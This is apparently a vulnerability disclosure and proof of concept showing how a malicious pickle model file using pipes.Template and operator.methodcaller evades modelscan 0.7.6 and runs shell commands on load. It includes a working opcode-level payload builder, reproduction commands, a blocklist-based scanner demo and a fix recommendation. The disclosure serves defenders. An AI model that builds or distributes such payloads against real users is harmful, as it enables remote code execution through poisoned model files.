modelscan Bypass PoC: pipes.Template()

Vulnerability

modelscan 0.7.6 fails to detect malicious pickle files that use pipes.Template() for shell command execution. pipes is a Python stdlib module for building shell pipelines, and it is not in modelscan's unsafe_globals blocklist. Note that pipes was deprecated in Python 3.11 and removed in 3.13, so the payload only fires on interpreters that still ship the module; the scanner gap itself is independent of the interpreter the scan runs under.

Attack Chain

  1. pipes.Template(): creates an empty shell pipeline template
  2. operator.methodcaller("append", cmd, "--")(template): appends an arbitrary shell command as a pipeline step ("--" marks a step that reads stdin and writes stdout)
  3. operator.methodcaller("open", "/dev/null", "w")(template): opens the pipeline for writing; Template.open() builds the shell command line and hands it to os.popen(), which spawns /bin/sh and starts the command
  4. operator.methodcaller("close")(fh): closes the write end and waits for the shell to exit, so the command has completed by the time pickle.load() returns

Impact

  • Full RCE via pickle.load() or torch.load()
  • Bypasses modelscan 0.7.6 completely: the scan reports "No issues found"
  • Uses only stdlib modules (pipes, operator.methodcaller)
  • pipes.Template.open() calls os.popen() internally, but the blocklist only checks the module and attribute names that appear in the pickle's GLOBAL/STACK_GLOBAL opcodes, and os never appears there

Reproduction

python create_poc.py
modelscan scan -p pytorch_model.bin
# Output: "No issues found"

python -c "import pickle; pickle.loads(open('pytorch_model.bin','rb').read())"
# Creates /tmp/pipes_bypass_proof

Root Cause

modelscan checks pickle GLOBAL/STACK_GLOBAL opcodes against a blocklist of module+function pairs. pipes.Template is not in the blocklist. The fact that pipes.Template.open() internally delegates to os.popen() is invisible to the scanner because the call happens at Python runtime, not in the pickle bytecode.

Fix Recommendation

Add "pipes": "*" to unsafe_globals.CRITICAL in modelscan/settings.py. This closes the pipes path specifically; any other stdlib callable that reaches os.popen() or subprocess only at call time would need the same treatment, because an opcode-level scanner cannot follow calls made after unpickling.
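The four-step chain above expressed as raw pickle opcodes, next to a minimal GLOBAL/STACK_GLOBAL scanner of the kind the Root Cause section describes, so the bypass and the one-line fix can be seen side by side. This is an added example, not the repository's create_poc.py and not modelscan's code; the BASELINE blocklist is an assumed illustrative subset standing in for modelscan's unsafe_globals, not a copy of it. The payload is only built and scanned here, never loaded, and the command string is a placeholder.

```python
import io
import pickletools
import struct

# Opcode bytes from the pickle protocol (protocol 2 is enough for this chain).
PROTO, GLOBAL, EMPTY_TUPLE, REDUCE = b"\x80\x02", b"c", b")", b"R"
BINUNICODE, TUPLE1, TUPLE3, POP, STOP = b"X", b"\x85", b"\x87", b"0", b"."


def _global(module, name):
    # GLOBAL: module and attribute name, each newline terminated
    return GLOBAL + f"{module}\n{name}\n".encode()


def _unicode(s):
    # BINUNICODE: 4-byte little-endian length followed by UTF-8 bytes
    data = s.encode("utf-8")
    return BINUNICODE + struct.pack("<I", len(data)) + data


def _memo_put(i):
    return b"q" + bytes([i])  # BINPUT i: remember top of stack


def _memo_get(i):
    return b"h" + bytes([i])  # BINGET i: push memo slot i


def build_payload(cmd):
    """Emit the pipes.Template() chain as pickle bytes (constructed, never loaded here)."""
    mc = _global("operator", "methodcaller")
    return b"".join([
        PROTO,
        # 1. template = pipes.Template(); keep it in memo slot 0, drop it from the stack
        _global("pipes", "Template"), EMPTY_TUPLE, REDUCE, _memo_put(0), POP,
        # 2. operator.methodcaller("append", cmd, "--")(template)
        mc, _unicode("append"), _unicode(cmd), _unicode("--"), TUPLE3, REDUCE,
        _memo_get(0), TUPLE1, REDUCE, POP,
        # 3. fh = operator.methodcaller("open", "/dev/null", "w")(template); memo slot 1
        mc, _unicode("open"), _unicode("/dev/null"), _unicode("w"), TUPLE3, REDUCE,
        _memo_get(0), TUPLE1, REDUCE, _memo_put(1), POP,
        # 4. operator.methodcaller("close")(fh): waits for the shell to exit
        mc, _unicode("close"), TUPLE1, REDUCE,
        _memo_get(1), TUPLE1, REDUCE,
        STOP,
    ])


def is_well_formed(data):
    """pickletools.dis simulates the stack and memo and raises on malformed input."""
    pickletools.dis(data, out=io.StringIO())
    return True


_STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
               "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def referenced_globals(data):
    """Every (module, name) pair a GLOBAL or STACK_GLOBAL opcode would import.

    STACK_GLOBAL takes module and name from the two strings pushed before it;
    tracking only literal string pushes is a simplification that suffices here.
    """
    refs, recent = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in _STRING_OPS:
            recent = (recent + [arg])[-2:]
        elif op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            refs.append((module, name))
        elif op.name == "STACK_GLOBAL":
            refs.append((recent[0], recent[1]))
    return refs


def scan(data, blocklist):
    """Opcode-level check: flag only module/attribute pairs that appear verbatim."""
    findings = []
    for module, name in referenced_globals(data):
        rule = blocklist.get(module)
        if rule == "*" or (isinstance(rule, set) and name in rule):
            findings.append((module, name))
    return findings


# Assumed illustrative subset of a modelscan-style blocklist (not copied from modelscan).
BASELINE = {
    "os": "*", "posix": "*", "nt": "*", "subprocess": "*", "sys": "*",
    "shutil": "*", "socket": "*", "runpy": "*", "webbrowser": "*",
    "builtins": {"eval", "exec", "compile", "open", "__import__"},
}
# The recommended fix: blocklist the whole pipes module.
HARDENED = {**BASELINE, "pipes": "*"}

if __name__ == "__main__":
    payload = build_payload("touch /tmp/pipes_bypass_proof")  # placeholder command, never executed
    is_well_formed(payload)
    print("baseline:", scan(payload, BASELINE))  # [] -> the scanner would say "No issues found"
    print("hardened:", scan(payload, HARDENED))  # [('pipes', 'Template')]
```

The scanner sees exactly four imports in the payload, pipes.Template and three operator.methodcaller references, and nothing under os; the os.popen() call happens inside Template.open() at unpickle time, which is why only the module-level rule for pipes catches it.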
